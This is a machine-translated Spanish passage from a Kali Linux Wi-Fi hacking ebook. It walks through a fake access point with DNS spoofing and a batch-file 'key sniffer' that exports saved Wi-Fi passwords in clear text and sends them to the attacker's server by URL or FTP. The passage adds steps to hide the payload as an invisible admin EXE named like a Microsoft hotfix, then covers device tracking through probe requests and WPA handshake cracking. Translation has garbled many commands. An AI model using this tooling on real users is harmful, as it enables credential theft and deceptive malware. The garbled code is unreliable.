Ya sea un dispositivo Android, iOS, una computadora con Windows o una Mac. Simplemente puede diseñar su servidor

web apache para atacar específicamente al tipo de objetivo. O incluso una versión específica del sistema operativo.

Diga un vector de ataque diferente para los clientes de iOS 9.x y diferente para los clientes de iOS 10. ¡Simplemente funciona!

Aquí nos dirigimos a la máquina con Windows porque tiene la base de instalación más amplia. Entonces, un objetivo bastante

común de Windows es para un hacker.

Edite el archivo de configuración predeterminado de Apache para configurar la funcionalidad de reescritura. Esto redirigirá

casi cualquier URL, incluidos los subdirectorios, a nuestra página Fake AP.

156
Machine Translated by Google

Abra el archivo de configuración predeterminado de apache

nano /etc/apache2/sites-enabled/000-default

E ingrese el texto subrayado en el archivo entre la etiqueta <directory> </directory>.

Tenga en cuenta que estamos agregando un directorio llamado /Fixit como excepción. Es sensible a mayúsculas y minúsculas.

Agregaremos este directorio en la parte 2.

<Directorio /var/www/>
Opciones Índices FollowSymLinks MultiViews
AllowOverride Ninguno
Solicite permiso ,
deniegue permiso de
todo RewriteEngine On
RewriteCond %{REQUEST_URI} !^/Fixit RewriteRule ^.*$ /
Fixit/ </Directory>

Habilitar módulo mod_rewrite

reescritura de a2enmod

Debe reiniciar apache2 para actualizar la configuración.

reinicio del servicio apache2

Paso 4: dns falsos

Ejecutar dnsspoof simplemente redirigirá todas las solicitudes HTTP (no HTTPS) a nuestro servidor apache y no permitirá que

la víctima acceda a Internet (si el reenvío de IP está deshabilitado).

Es posible que esto no sea lo que desea si está atacando dominios específicos junto con el acceso a Internet. En ese caso,
use el archivo [Link] con dnsmasq

Pero por ahora, no proporcionamos acceso a Internet a la víctima, sino que simplemente los pwn'em a todos. Entonces, ejecuta:

dnsspoof -i wlan0 #wlan0 es la interfaz en la que está operando hostapd

Paso 5: Cosecha las llaves

Ejecute apache [Link] en el modo de salida de datos adjuntos y canalícelo a través de grep. La expresión regular analizará

nuestra salsa secreta entrante para SSID/nombres de hasta 20 caracteres, tipo de autenticación AP y claves WLAN de 8-64 caracteres.

157
Machine Translated by Google

cola -F /var/log/apache2/[Link] | grep -E -o

"<nombre>.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?< /
name>"\|"<keyMaterial>..?.?.?.?.?.?.?.?.?. ?.?.?.?.?.?.?.?.?.?. ?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?. ?.?.?.?.?.?.?.?.?.?.?
.?</keyMaterial>"\|"<autenticación>.?.?.?.?.?.?.?.?.?.?.?</autenticación>" | uniq

Desglose del comando: tail -F <archivo

de registro>: Comando de cola con el parámetro -F con lectura de las últimas 10 líneas del archivo [Link], espera y
mostrar los datos tan pronto como se adjunten.

La salida luego se pasa a grep, en tiempo real

agarre:
-E : Interpretar PATRÓN como una expresión regular extendida
-o : Imprima solo las partes coincidentes (no vacías) de una línea coincidente, con cada una de esas partes en una
línea de salida separada
único: Eliminar entradas repetidas

Tomar un descanso

Paso 6: Terminando
Cree un directorio llamado "Fixit" en /var/www/, ¡sensible a mayúsculas y minúsculas!

mkdir /var/www/Reparar

Paso 7: Salsa Secreta

Mi enlace de descarga [Link] apunta a mi archivo personalizado "[Link]". [Link] no es demasiado complicado, no activará el

antivirus ni se verá afectado por ningún firewall. Si el navegador web funciona, esto funcionará.

@echo off
SET mypath=%~dp0
echo %random%-%random%.log > %temp%\tmpfile SET /p
filename=< %temp%\tmpfile del %temp%\tmpfile

netsh wlan perfil de exportación > nul netsh

wlan perfil de exportación key=clear > nul

setlocal enableextensions enabledelayedexpansion set /a counter=0

set filecontent=

for %%b in (*.xml) do ( set /a

counter=!counter! + 1 :: echo %%b for /f
"delims=" %%a in ('type "%mypath%\%
%b "') hacer ( establecer contenido de archivo =! contenido de archivo! %%a

) ) echo !archivo contenido! > [Link]

@rem La siguiente línea es específica de la plataforma. A veces, en una carpeta diferente "c:
\Program Files\Internet Explorer\[Link]" [Link]/"!filecontent!"

158
Machine Translated by Google

Tan pronto como la víctima ejecuta el rastreador de claves Wi-Fi malicioso, abrirá Internet Explorer en el dispositivo de
la víctima con una URL que apunta a [Link] (nuestro servidor) con las claves Wi-Fi recolectadas dentro de la
URL.
Elegí URL porque es la forma más segura de enviar datos al servidor. El FTP podría bloquearse en algunas máquinas,
pero como la víctima descargó el archivo, significa que el navegador puede aprovecharse para la explotación.

Todo lo que necesita hacer es filtrar los datos por tipo de autenticación y el material clave (contraseña de Wi-Fi).
Filtramos eso en el paso 5, usando los comandos tail y grep

<nombre>rootsh3ll</nombre>
<autenticación>WPA2PSK</autenticación>
<keyMaterial>iamrootsh3ll</keyMaterial>

No hay necesidad de hacer nada extra. Todo está configurado, solo vea venir las credenciales.

Paso 8: Hágalo más sigiloso (Opcional)

Para ser honesto, en esta etapa este ataque no es sigiloso en absoluto. es muy incompleto
¿Un archivo por lotes para actualizar? ¿Algún código XML súper largo en mi URL?
¿Por qué mi Windows dice "Sin conexión a Internet" y todavía puedo acceder a [Link]?
Estas son algunas preguntas que muy probablemente cruzan la mente de la víctima bajo sospecha. Para eludir esto,
debemos "parecer" legítimo para el usuario final. Tenemos que hacer es sigiloso.

Entonces, ¿qué podemos hacer posiblemente?

Aquí hay algunas ideas que puede implementar si desea llevar este ataque un paso más allá:
1. Convertir lote a exe (con privilegios de administrador)
2. Comprima el archivo xml en un formato zip, luego
una. Codifique el archivo zip y envíelo a través de URL, como antes
b. Enviarlo por FTP

3. Suplantar la "Conexión a Internet" para el cliente (Android, iOS, Windows, Mac)

1. Convertir (bat) ch a exe (en línea/fuera de línea)

Descargo de responsabilidad: el antivirus puede activar los archivos EXE convertidos como un archivo malicioso y provocar su eliminación.
Omitir los AV es un tema completo en sí mismo. Para simplificar, este capítulo resonará en torno a un sistema sin AV instalado.

Bat to Exe Converter puede convertir archivos de script BAT (.bat) al formato EXE (.exe).

[Link] tiene un software realmente fácil de usar escrito para la conversión de batch2exe. Puede descargarlo y convertirlo
fuera de línea según su comodidad o convertirlo en línea y luego
descargar el archivo convertido.

Es realmente simple en ambos sentidos.

Convertidor sin conexión: [Link]

Convertidor Bat2exe en línea: [Link]

159
Machine Translated by Google

Teniendo en cuenta que estamos ejecutando Kali Linux, pero el convertidor es un ejecutable de Windows. Por lo tanto,
primero debemos ejecutar el archivo en Linux.

Descargue Bat_To_Exe_Converter.zip en una carpeta.

Descargar Wine - (W)ine (I)s (N)ot an (E)mulator

WINE es un programa que permite que los programas desarrollados para Microsoft Windows se ejecuten en sistemas
similares a Unix. Es una herramienta realmente útil para ejecutar ejecutables ligeros de bajo recurso para ejecutar bajo
Linux.

sudo apt install vino -y

Convertir usando GUI

Extraiga Bat_To_Exe_Converter.zip y ejecute el ejecutable portátil:

clon de git [Link]

cd b2e/
descomprima Bat_To_Exe_Converter.zip #Extraer en el directorio actual
cd portátil/
vino Bat_To_Exe_Converter_\(Configuración\).exe #Ejecutar exe portátil en modo GUI

160
Machine Translated by Google

Configuración utilizada en la imagen de arriba:

Ruta al archivo por lotes

Ubicación de salida con un nombre de archivo Microsoft-Windows-Revisión-20170520_x86.exe

legítimo: Visibilidad: Invisible. Sin comando Windows después del lanzamiento

Directorio de trabajo: Temporario. No se han creado archivos en el directorio actual

Archivos temporales: La carga útil también se eliminará al salir. Elegir sabiamente.

Cifrado: Varios: No requerido

De forma predeterminada, el archivo se ejecutará como administrador

Arquitectura: Crear archivos con ambos. Sistemas de 32/64 bits, como

Microsoft-Windows-Hotfix-20170520_x64.exe.

Apuntaremos a ambos sistemas, 32 bits (x86) y 64 bits (x64)

Ahora, ya que eligió la configuración requerida. Presiona compilar y mueve los archivos en el directorio de trabajo
de apache /var/ www/ html/

cpMicrosoft *.exe / var/www/html/

Convertir usando la línea de comandos

Hay una forma más rápida de compilar, afortunadamente, el convertidor Bat2Exe también admite el acceso a la
línea de comandos. Simplemente escriba '/?' bandera al comando vino para ver las opciones disponibles

vino Bat_To_Exe_Converter_\(Configuración\).exe /?

161
Machine Translated by Google

Uso: vino

Bat_To_Exe_Converter.exe -bat [Link] -save [Link] {opciones}

La imagen es bastante autoexplicativa. Aquí hay un comando de ejemplo para una configuración similar que usamos con GUI, para la

arquitectura de Windows x86.

vino Bat_To_Exe_Converter.exe -bat [Link] -save Microsoft-Windows-Hotfix-20170520_x86.exe -invisible -temp -nodelete

-admin

Asegúrese de que [Link] esté presente en su directorio actual.

2. Comprima el archivo xml en un formato zip

Hay una manera de comprimir un archivo en formato zip usando un script VB (Visual Basic) a través de un archivo por lotes.

establecer TEMPDIR=c:
\temp123 establecer FILETOZIP=c:
\temp123\[Link] rmdir %TEMPDIR%
mkdir %TEMPDIR%
xcopy /s %FILETOZIP% %TEMPDIR%
echo Set objArgs = [Link] > _zipIt.vbs echo InputFolder
= objArgs(0) >> _zipIt.vbs echo ZipFile = objArgs(1) >> _zipIt.vbs
echo CreateObject ("[Link]").CreateTextFile(ZipFile,
True).Escribe "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs echo Set objShell = CreateObject( "[Link]ón")
>> _zipIt.vbs echo Establecer fuente = [Link](InputFolder).Items >> _zipIt.vbs echo
[Link](ZipFile).CopyHere(fuente) >> _zipIt.vbs echo [Link] 2000 >> _zipIt.vbs CScript _zipIt.vbs
%TEMPDIR% C:\%TEMPDIR%\[Link] pausa

Este es un script simplista que repite el código vbs en el archivo: _zipIt.vbs. Y ejecuta vbscript en segundo plano usando la utilidad

CScript . Luego creará automáticamente un archivo zip de los datos de [Link] Ahora, solo necesitamos codificar el archivo zip.

una. Codificar el archivo zip

En realidad, Windows tiene una utilidad que codifica y decodifica base64 a texto sin formato y viceversa: una utilidad llamada certutil

Para codificar un archivo:

• certutil -encode <nombre del archivo de entrada> <nombre del archivo de salida codificado>

Para decodificar un archivo:

• certutil -decode <nombre del archivo de entrada codificado> <nombre del archivo de salida decodificado>

162
Machine Translated by Google

Hay una serie de verbos y opciones disponibles para certutil.

Simplemente coloque el código justo después del archivo comprimido: para codificar C:\%TEMPDIR%\[Link]

certutil -encode .\[Link] [Link]

Longitud de entrada = 511

Longitud de salida = 762
CertUtil: el comando -encode se completó correctamente.

El archivo [Link] codificado muestra datos como

-----INICIAR CERTIFICADO-----
UEsDBBQAAAAIAPwJ80ok6C9vjQEAAIgFAAAIAAAAZGF0YS50eHTVU9FKwzAUfa7g
P4x+wKKrdCJ3GWNuILM6rKCvsbtbw9qkJJmzfr1NSlk3BUFF9CnknHvPPbc5heFL
nnWeUWkuxcA/7Z74QwoP16ObuZJLnmGn6oUe+KkxxQUh2+22m/NESS2XppvInAg0
W6nWXKyIbSNF3UeeT33qgWA5UiWl0WmQZZ0eEId4EMdXl2MplnxFvfpWnR6k+EL7
vXAaTvtn/SA8D4JwHI6BWNzy+3qNmgekVqjPRhcSKviAHWQQmplyrty
AmnOxIZl7ToHexDFkZ2kMdkobkpnh21MOhGJKgtbaKEaQ2F4whwmCxRADkBXiLtG
IQUCwQOljcZbgY90yTJd0c3VUuTdZCA7Z0CcWYhYcsfEQub81c39+mMGPnWO2VOG
e5KNuY8o6+PAAQXSCheFX43f3w9f9ary56L3MB/15vHs0/SNJvE3w1d5S5nCxQzL
unuNpduwYFrPU8WsRIO5guqdTLUjLpoBO6ARiJhBxVlGOctbX73NODft0f/yL+gc
H70BUEsBAhQAFAAAAAgA / AnzSiToL2 + NAQAAiAUAAAgAAAAAAAAAAQAgAAAAAAAA
AGRhdGEudHh0UEsFBgAAAAABAAEANgAAALMBAAAAAA ==
-----FIN DEL CERTIFICADO-----

Todo lo que necesita hacer es almacenar esta salida de archivo como variable y pasarla a lo largo de la URL que hicimos

anteriormente

escriba [Link] > tmpFile set /p

value=<tmpFile del tmpFile

"c:\Archivos de programa\Internet Explorer\[Link]" [Link]/"!value!"

O envíe el archivo directamente a través de FTP y luego decodifique el texto usando la función certutil -decode.

b. Enviar archivo zip a través de FTP

Utilice CERTUTIL o envíe el archivo zip a través de FTP

Instale y configure el servidor FTP en Kali Linux para recibir archivos

apt instalar vsftpd

Establezca el nombre de usuario en "arreglar" y la contraseña esté en blanco

@echo off
echo usuario fix@[Link] > [Link]

163
Machine Translated by Google

echo fixtest>> [Link] echo

put “C:\%TEMPDIR%\[Link]”>> [Link] echo quit>>
[Link] ftp -n -s:[Link] [Link] del
ftpcmd. Cual

Esto enviará el archivo [Link] directamente a nuestro servidor FTP.

Ahora está listo para probar su configuración ahora.

¿Tarea?

¡Organiza los archivos en un orden de trabajo y cómpralos todos!

Ahora puede llevar algo de tiempo organizarlo, pero vale la pena aprenderlo.

No olvide compartir su experiencia y hacer todas las consultas relacionadas [Link]

164
Machine Translated by Google

10
Hackeo de Wi-Fi
[Apéndice]

Conducción de guerra: Introducción

La conducción de guerra, también llamada mapeo de puntos de acceso, es el acto de ubicar y posiblemente
explotar conexiones a redes de área local inalámbricas mientras se conduce por una ciudad o en otro lugar.

Aquí no hay ningún "pirateo", pero se puede usar en el "pirateo" de Wi-Fi de largo alcance para saber dónde
girar su antena direccional.
Si ya hay uno y me lo perdí, entonces pido disculpas.

Cálculo de la ubicación aproximada de los AP, en función de la intensidad de sus señales y la posición GPS de
cada intensidad de señal anotada, que obtenemos (capturamos) mientras conducimos/caminamos con nuestro
dispositivo Wi-Fi sincronizado con el dispositivo GPS.

165
Machine Translated by Google

Cálculo de la ubicación del punto de acceso

En primer lugar en nuestra base de datos con
pares capturados, (coordenadas, potencia
fuerza) y otros datos, es la ubicación 1.

Aquí notamos la fuerza de la señal [-40] y con

el conocimiento de la potencia de salida del AP
(determinada por la ley de cada país) y la
pérdida de fuerza de la señal por distancia,
podemos calcular la distancia teórica desde el
AP.

obtenga un círculo (que representa

la distancia) alrededor de la posición 1.

Se repiten los mismos pasos para la

ubicación 2 (donde la intensidad de la señal
es [-20], lo que significa una distancia más
pequeña desde AP, lo que conduce a un círculo
más pequeño en comparación con la ubicación
1) y la ubicación 3 (donde la intensidad de la
señal es [-90], lo que significa mayor distancia
desde AP, lo que conduce a un círculo más
grande en comparación con la ubicación 1).

En punto, donde los tres círculos se encuentran es la ubicación teórica de AP, marcada con un círculo rojo.
Para la presentación, utilicé solo 3 ubicaciones para que fuera lo más simple posible, pero con más ubicaciones
registradas, la ubicación AP calculada será más precisa.

¿Cómo hacerlo?

Necesitarás un dispositivo con GPS y un dispositivo portátil (laptop o computadora tipo raspberry-pi)
y una antena externa preferible (la intensidad de la señal desde un automóvil es mejor y no desea conducir su computadora
portátil en el techo).

Eso es mucho trabajo que tal vez esté fuera del alcance de este libro, pero utilizaremos el wardriving para
nuestro beneficio, por ejemplo, para encontrar nuestros dispositivos robados. Por lo general, hay menos posibilidades,
pero vale la pena intentarlo. Quién sabe dónde encuentras tu costosa máquina.

Profundicemos en las posibilidades de wardriving

166
Machine Translated by Google

Encuentra dispositivos perdidos/robados

Un dispositivo robado o perdido siempre causa dolor, pero todavía hay una pequeña esperanza para que usted o sus
seres queridos se ayuden a recuperar el dispositivo. ¿Recuerda que los dispositivos Wi-Fi envían solicitudes de sondeo
todo el tiempo y podemos rastrear los datos del paquete a partir de eso?
¡Sí! Esto es lo que usaremos para localizar el dispositivo perdido/robado.
Este es un tipo de wardriving y aprenderemos 2 formas de realizar dicho método en este capítulo.

Localizar dispositivo wifi con probemon

probemon es una herramienta de línea de comando simple para monitorear y registrar tramas de solicitud de sonda
802.11.

Instalación
clon de git [Link]
prueba de cd
chmod +x [Link] actualizació[Link]
./[Link] --ayuda #Para el menú de ayuda

Uso
uso: [Link] [-h] [-i INTERFAZ] [-t TIEMPO] [-o SALIDA] [-b MAX_BYTES]
[-c MAX_BACKUPS] [-d DELIMITADOR] [-f] [-s] [-r] [-D] [-l]

una herramienta de línea de comandos para registrar tramas de solicitud de sonda 802.11

argumentos opcionales:
-h, --help -i mostrar este mensaje de ayuda y salir
INTERFAZ, --interface INTERFAZ -t TIEMPO, -- interfaz de captura
time TIEMPO -o SALIDA, --output SALIDA -b formato de hora de salida (unix, iso)
MAX_BYTES, --max-bytes MAX_BYTES -c ubicación de salida de registro
MAX_BACKUPS, --max-backups MAX_BACKUPS tamaño máximo de registro en bytes antes de rotar
número máximo de archivos de registro para mantener
-d DELIMITER, --delimiter DELIMITER campo de salida delimitador
-f, --mac-info incluye el fabricante de la dirección MAC
-s, --ssid -r, -- incluir el SSID de la sonda en la salida
rssi incluir rssi en la salida
-D, --depuración habilitar la salida de depuración
-l, --registro habilitar la vista en vivo de desplazamiento del archivo de registro

Para comenzar a rastrear marcos de baliza, primero coloque la tarjeta inalámbrica en modo monitor

servicio administrador de red detener #si no se elimina, Probemon no funcionará (en modo administrado)
ifconfig wlan0 inactivo iwconfig wlan0 #déjalo para cambiar el modo operativo
mode monitor ifconfig wlan0 activo #ejecutar iwconfig para verificar modo:monitor
#subir la interfaz

ejecute Probemon con las opciones requeridas, es decir, mac-info, ssid, intensidad de la señal (rssi) y desplazamiento en vivo

167
Machine Translated by Google

./[Link] -f -s -r -l -i wlan0
1500286780 [Link] -75 Equipo de comunicación Gionee Co., Ltd.
1500286780 [Link] -21 Apple Inc.
1500286781 [Link] -71 Foxconn (NanJing) Communication Co., Ltd.
1500286782 [Link] -77 Motorola Mobility LLC, una empresa de Lenovo
1500286785 88: 28: b3: a6: 5c: 40 -71 TECNOLOGÍAS CO., LTD DE HUAWEI
1500286786 [Link] -75 Equipo de comunicación Gionee Co., Ltd.

Desglose de salida:
Columna 1: marca de tiempo de Unix

Columna 2: Dirección MAC del dispositivo de sondeo (cliente, no enrutador)

Columna 3: indicador de intensidad de la señal recibida (rssi)
Columna 4: SSID, ese cliente está buscando

También puede minimizar la consulta de entrada apilando todos los parámetros juntos

Tenga en cuenta que el parámetro que requiere un valor (-i) se mantiene al final para que podamos pasarle el nombre de la
interfaz (valor requerido)

./[Link] -fsrli wlan0

1500286021 [Link] -45 Apple Inc. raícesh3ll
1500286021 [Link] -45 Apple Inc. raícesh3ll
1500286025 [Link] -73 Xiaomi Comunicaciones Co Ltd
1500286027 80: 6a: b0: ce: 50: e8 -55 DESCONOCIDO raícesh3ll

Suponiendo que ya tiene la dirección MAC de la máquina robada, querrá filtrar la salida para la dirección MAC
deseada. Use grep para filtrar la salida en vivo

./[Link] -fsrli wlan0 | grep -i "[Link]"

1500286164 [Link] -37 Apple Inc.
1500286169 [Link] -35 Apple Inc.

Para guardar la información para probablemente más tarde, use la opción -o

./[Link] -fsrli wlan0 -o [Link]

Guarde solo los SSID que los clientes están buscando y mapee su localidad. ¡Prepare un ataque utilizando un punto de acceso falso con el
SSID más popular y utilícelos a todos!

¿Qué es la lista IEEE OUI?

Un identificador único organizacional (OUI) es un número de 24 bits que identifica de manera única a un
proveedor, fabricante u otra organización.
En las direcciones MAC, el OUI se combina con un número de 24 bits (asignado por el propietario o
"cesionario" del OUI) para formar la dirección. Los tres primeros octetos ([Link]) de la dirección son el OUI.

Usando la lista OUI, podemos identificar fácilmente la dirección MAC o el dispositivo deseado de un proveedor
específico en tiempo real.

168
Machine Translated by Google

Probemon usa netaddr, una biblioteca de manipulación de direcciones de red para Python. Nos permite buscar
información única de la organización IEEE (OUI, IAB).

Un extracto del archivo [Link] de la biblioteca netaddr

00-03-93 (hex) (base Manzana

16) 000393 Manzana
1 bucle infinito
Cupertino CA 95014
ESTADOS UNIDOS
00-03-94 (hex) (base conectar uno
16) 000394 conectar uno
Calle Hanagar, 2
Kfar Saba 44425

Probemon es un script realmente bueno con muchas características útiles como el desplazamiento en vivo (--log), el
indicador de intensidad de la señal recibida (--rssi) para la intensidad de la señal del cliente. Incluso muestra el proveedor
del dispositivo detectado, pero no hay opción para actualizar la lista OUI dentro del script, por lo que tengo que escribir
una pequeña solución para actualizar el script.

Vea [Link] en la carpeta de Probemon, simplemente ejecútelo para actualizar la base de datos de OUI.

chmod +x [Link] ./ #hacerlo ejecutable

[Link] #ejecutar [Link] como root

¿Cómo actualizar manualmente la Lista OUI?

Mover a netaddr/eui.

cd "/usr/local/lib/python2.7/dist-packages/netaddr/eui/"

Cambie el nombre de [Link] existente a [Link], para la copia de seguridad.

mv [Link] [Link]

Descargue el último archivo [Link] de [Link].

wget "[Link]

Actualice la base de datos para el último archivo [Link]

sudo python [Link]

[Link] detecta el [Link] e inserta los datos disponibles en el archivo de la base de datos ([Link], [Link])

169
Machine Translated by Google

Validación de apretón de manos

Muy a menudo terminamos con un apretón de manos inválido y no hace más que desperdiciar nuestro valioso tiempo durante
las pruebas de penetración.

Se debe verificar previamente la existencia de un Handshake WPA/2 válido. Esta verificación podría ahorrarle innumerables

horas desperdiciadas.

Usaremos Wireshark para analizar y extraer protocolos de enlace WPA/2 válidos de los archivos de captura.

Requisitos:
Ya debes tener un apretón de manos

Fundamentalmente, hay 2 formas de verificación:

1. Manualmente
2. Usar herramientas automatizadas

Manualmente: Uso de Wireshark Packet Analyzer

Paso 1: Abra su archivo pcap con Wireshark (como root)

captura de [Link] &

Paso 2: filtre sus marcos MAC, EAPoL y beacon

Aplique un filtro de visualización al archivo .cap para que solo veamos lo que necesitamos.
Necesitamos ver marcos de baliza y eapol.

Filtro Wireshark:

[Link]==[Link] && eapol o [Link].type_subtype==0x08

Desglose de comandos:

[Link]==[Link] dirección LAN inalámbrica, <dirección Mac>

eapol: Protocolo de autenticación extensible (EAP) sobre LAN
[Link].type_subtype==0x08:
FC: Cuadros de control de gestión
tipo_subtipo==0x08: 0x08 es el valor del subtipo para las tramas
Beacon, consulte la Tabla de tipos de tramas en el apéndice

170
Machine Translated by Google

Reemplace [Link] con la MAC de su punto de acceso.

1. Localice un marco de baliza en la columna de información.

2. Haga clic derecho en el marco de la baliza y seleccione "Marcar paquete (Alternar)". Ahora el faro
el marco debe ser negro porque está marcado.

3. Ahora que tenemos una baliza seleccionada, necesitamos dos paquetes más marcados como clave 1
y 2 del apretón de manos de 4 vías

Podrías hacer los cuatro, pero no es necesario. Puede ver partes del apretón de manos en la columna de información,
etiquetadas como "clave (mensaje 1/4)", etc.
Debe tener la baliza que ya marcamos y, además, marcar el mensaje clave 1/4 y el mensaje clave 2/4 haciendo clic con el
botón derecho en el paquete y seleccionando la opción Marcar paquete.

Las partes 1 y 2 del apretón de manos deben estar en el orden correcto o el apretón de manos no será válido
y nunca agrietarse.

Cosas clave a tener en cuenta durante la verificación de validación:

1. Desea que las partes 1 y 2 estén una al lado de la otra en una secuencia.
2. No mezcle partes clave de varias secuencias.
3. Las secuencias comienzan en 1/4 y terminan en 4/4.
4. En la imagen, cualquier parte 1 en la secuencia superior irá con la parte 2 en la parte superior
secuencia evitar secuencias fuera de orden.
5. Ahora debería tener tres paquetes marcados, una baliza, el mensaje 1 y el mensaje 2.

Ahora que los paquetes están marcados

1. Vaya a la esquina superior derecha. Archivo > Guardar como

2. Establezca un nombre de archivo, diga [Link]

3. Seleccione "Solo paquetes marcados" para guardar solo los paquetes de protocolo de enlace correctos .

A continuación, puede verificar el nuevo archivo de captura usando aircrack-ng.

Si todo salió bien, verá 1 apretón de manos porque eso es todo lo que hay en el archivo pcap. • Si ESSID está
ausente, eso significa que no recibió el paquete de baliza. • Si no hay un apretón de manos, significa que
no recibió los mensajes clave correctos.

Ahora que tiene un archivo pcap limpio, puede convertirlo en un archivo hccap para usarlo con hashcat.
Aircrack hace la conversión.

Sintaxis: aircrack-ng <nombre de archivo pcap> -J <nombre de archivo de captura Hashcat>

aircrack-ng [Link] -J limpio

Esto creará un archivo Hashcat Capture, [Link]

171
Machine Translated by Google

Usando herramientas como: Aircrack-ng, Pyrit

Como ya sabrá, pyrit puede analizar los archivos de protocolo de enlace y decirle de una manera bastante críptica si su
protocolo de enlace es bueno o no. No siempre es correcto. aircrack-ng también tiene algunos problemas para verificar
si los apretones de manos son válidos.

Usaremos las mismas técnicas discutidas anteriormente para extraer y modificar el contenido de los archivos .cap.
Independientemente de lo que informen los programas, probé todos los ejemplos a continuación y todos los ejemplos se
pueden descifrar, excepto el ejemplo 4.

Ejemplo 1:

Nuestro archivo de tapa previamente limpiado que sabemos tiene un buen apretón de manos.

Pyrit dice que no es bueno.

pyrit -r [Link] analizar

Pirita 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
[Link]
Este código se distribuye bajo la Licencia Pública General GNU v3+

Analizando el archivo '[Link]' (1/1)...

Analizó 12 paquetes (12 paquetes 802.11), obtuvo 1 AP(s)

#1: Punto de acceso [Link] ('rootsh3ll'):

No se detectó un protocolo de enlace EAOPL + ESSID válido.

Aircrack-ng dice que es bueno. (aircrack es correcto porque se rompe con éxito)

aircrack-ng [Link] -w [Link]

Aircrack-ng 1.2 rc4

[Link] 36108/9822765 claves probadas (797,64 k/s)

Tiempo restante: 3 horas, 24 minutos, 39 segundos 0,37%

¡LLAVE ENCONTRADA! [ soyrootsh3ll ]

172
Machine Translated by Google

Llave maestra : 1F 4B 02 FE 4C 82 F4 E0 26 2E 60 97 E7 BA D1 F1
92 83 B6 68 7F 08 4F 73 33 1D B8 6C 62 49 8B 40

Clave transitoria: D9 E6 11 68 BC F0 0D DF 75 BB 36 ED 38 F2 8A 22
BA DA 5F 97 CF 2E 6F B1 49 3A 53 2B 45 78 7C 0C
56 C8 CE D5 BD 64 99 04 E7 0C 1A 7C 2C D7 87 C4
D5 90 50 E6 ED 40 60 94 BB C9 06 AA 55 35 FF 88

EAPOL HMAC : 99 92 11 87 16 7C 8D F2 D1 F9 9B 8E DF 6F 4D 86

Ejemplo 2:
Pyrit ama sus paquetes de mensajes 3 y 4, por lo que le daremos algunos, de la misma secuencia que los
mensajes 1 y 2, por supuesto.

Pyrit está feliz de tener las cuatro partes del apretón de manos, pero etiqueta el archivo de captura
como "viable". Aircrack pudo descifrarlo como antes.

pyrit -r [Link] analizar

Pirita 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
[Link]
Este código se distribuye bajo la Licencia Pública General GNU v3+

Analizando el archivo '[Link]' (1/1)...

Se analizaron 5 paquetes (5 paquetes 802.11), se obtuvieron 1 AP(s)

#1: Punto de acceso [Link] ('rootsh3ll'):

#1: Estación [Link], 1 apretón de manos:
N.º 1: HMAC_SHA1_AES, factible, propagación 1

Ejemplo 3:
al seleccionar paquetes ubicados más juntos, Pyrit ahora informa la captura como "buena" en lugar
de "viable".

A Pyrit le gusta más esto...

pyrit -r [Link] analizar

Pirita 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
[Link]
Este código se distribuye bajo la Licencia Pública General GNU v3+

Analizando el archivo '[Link]' (1/1)...

Se analizaron 5 paquetes (5 paquetes 802.11), se obtuvieron 1 AP(s)

#1: Punto de acceso [Link] ('rootsh3ll'):

#1: Estación [Link], 1 apretón de manos:
#1: HMAC_SHA1_AES, bueno*, propagación 1

173
Machine Translated by Google

Ejemplo 4:
En este ejemplo, elegí el mensaje clave 4 de una secuencia diferente de 1, 2 y 3.

NO DEBERÍAS HACER ESO.

Esta vez, Pyrit dice que es malo.

pyrit -r [Link] analizar
Pirita 0.5.1 (C) 2008-2011 Lukas Lueg - 2015 John Mora
[Link]
Este código se distribuye bajo la Licencia Pública General GNU v3+

Analizando el archivo '[Link]' (1/1)...

Analizó 4 paquetes (4 paquetes 802.11), obtuvo 1 AP(s)

#1: Punto de acceso [Link] ('rootsh3ll'):

#1: Estación [Link], 1 apretón de manos:
#1: HMAC_SHA1_AES, malo*, propagación 1

Aircrack-ng no puede decir que los paquetes m1 y m2 están fuera de secuencia y piensa que hay un apretón de
manos válido. Se ejecutará para siempre o hasta que agote la lista de palabras que puede desperdiciar
cientos, si no miles de horas.

Conclusión:
Pyrit a menudo informa que los archivos cap buenos son malos, y eso es algo malo. Aircrack-ng puede reportar
archivos malos como buenos, y eso es peor. Revise sus propios archivos de tapas y elimine lo que no necesita.
Y recuerda, mantente en una secuencia.

174
Machine Translated by Google

Gracias por comprar

Libro electrónico de Kali Linux Wireless Petesting and Security

Acerca de rootsh3ll
rootsh3ll, pronunciado "root-shell", publicó su primer libro, Mastering phpMyAdmin for Effective MySQL Management,
en abril de 2004 y, posteriormente, continuó especializándose en la publicación de libros muy centrados en tecnologías
y soluciones específicas.
Nuestros libros y publicaciones comparten las experiencias de sus compañeros profesionales de TI en la
adaptación y personalización de los sistemas, aplicaciones y marcos actuales. Nuestros libros basados en
soluciones le brindan el conocimiento y el poder para personalizar el software y las tecnologías que está utilizando para
realizar el trabajo. Los libros Packt son más específicos y menos generales que los libros de TI que ha visto en el
pasado. Nuestro modelo comercial único nos permite brindarle información más enfocada, brindándole más de lo que
necesita saber y menos de lo que no.
Packt es una compañía editorial moderna pero única que se enfoca en producir libros innovadores y de calidad
para comunidades de desarrolladores, administradores y novatos por igual. Para obtener más información, visite
nuestro sitio web en [Link].

Gana con rootsh3ll

“Pérdida que descubro , Beneficio que compartimos”

Puede convertirse en afiliado de este libro electrónico, donde gana el 50% del precio de venta vendiéndolo a sus
amigos o siguiéndolos.

Simplemente envíeme un mensaje a mi correo electrónico personal con el título "Afiliado de KLWPS" con la identificación
de correo electrónico con la que compró este libro electrónico en el contenido y le daré un código de cupón especial que
puede usar para enviar sus clientes potenciales al comprar este libro electrónico .

Entonces, ¿por qué esperar? Solo envíame un correo electrónico a harry@[Link] y ganemos juntos.

No solo busco afiliados; si tienes fuertes habilidades técnicas pero no escribes

experiencia, puedo ayudarlo a desarrollar una carrera como escritor, o simplemente obtener una recompensa adicional
por su experiencia al compartir su experiencia en el blog rootsh3ll o en los foros.

Suscríbete rootsh3ll para el boletín informativo y artículos de seguridad detallados y procesables

175